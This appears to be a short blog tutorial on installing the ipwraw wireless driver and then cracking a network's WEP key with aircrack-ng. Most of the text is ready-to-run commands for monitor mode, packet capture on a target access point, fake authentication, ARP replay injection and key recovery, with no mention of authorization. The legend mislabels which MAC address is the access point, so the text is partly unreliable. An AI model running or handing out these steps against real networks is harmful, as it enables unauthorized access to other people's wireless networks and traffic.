Installing ipwraw:
1.- wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2 (download driver)
2.- tar -xjf ipwraw-ng* (extract the archive file)
3.- cd ipwraw-ng (go to the extracted folder)
4.- make (compile)
5.- sudo make install (install the driver)
6.- sudo make install_ucode
7.- echo blacklist ipwraw | sudo tee /etc/modprobe.d/ipwraw (blacklist the default ipwraw)
8.- sudo depmod -ae (create a dependency file for the modules)
9.- sudo modprobe ipwraw (load the driver that you installed)
10.-sudo ifconfig wlan0 up (enable the network adapter)
11.-airmon-ng start wlan0 (put your interface into monitor mode)
If the network interface is set correctly, it should say Monitor mode.
Use the injection test to confirm your card can inject prior to proceeding:
# sudo aireplay-ng -9 mon0
Start airodump-ng to discover all the available networks
# sudo airodump-ng mon0Start airodump-ng to collect the new unique IVs
# sudo airodump-ng -c 11 --bssid xx:xx:xx:xx:xx:xx -w test -i mon0Use aireplay-ng to do fake authentication with the access point
# sudo aireplay-ng -1 0 -e datel -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0Start aireplay-ng in ARP request replay mode to inject packets
# sudo aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0Run aircrack-ng to crack the WEP key using the IVs collected
# sudo aircrack-ng -z -b xx:xx:xx:xx:xx:xx test*.ivs
# sudo aircrack-ng -a 1 -0 -n 128 test*.ivs
xx:xx:xx:xx:xx:xx (MAC address of client)
yy:yy:yy:yy:yy:yy (our Mac address)
No comments:
Post a Comment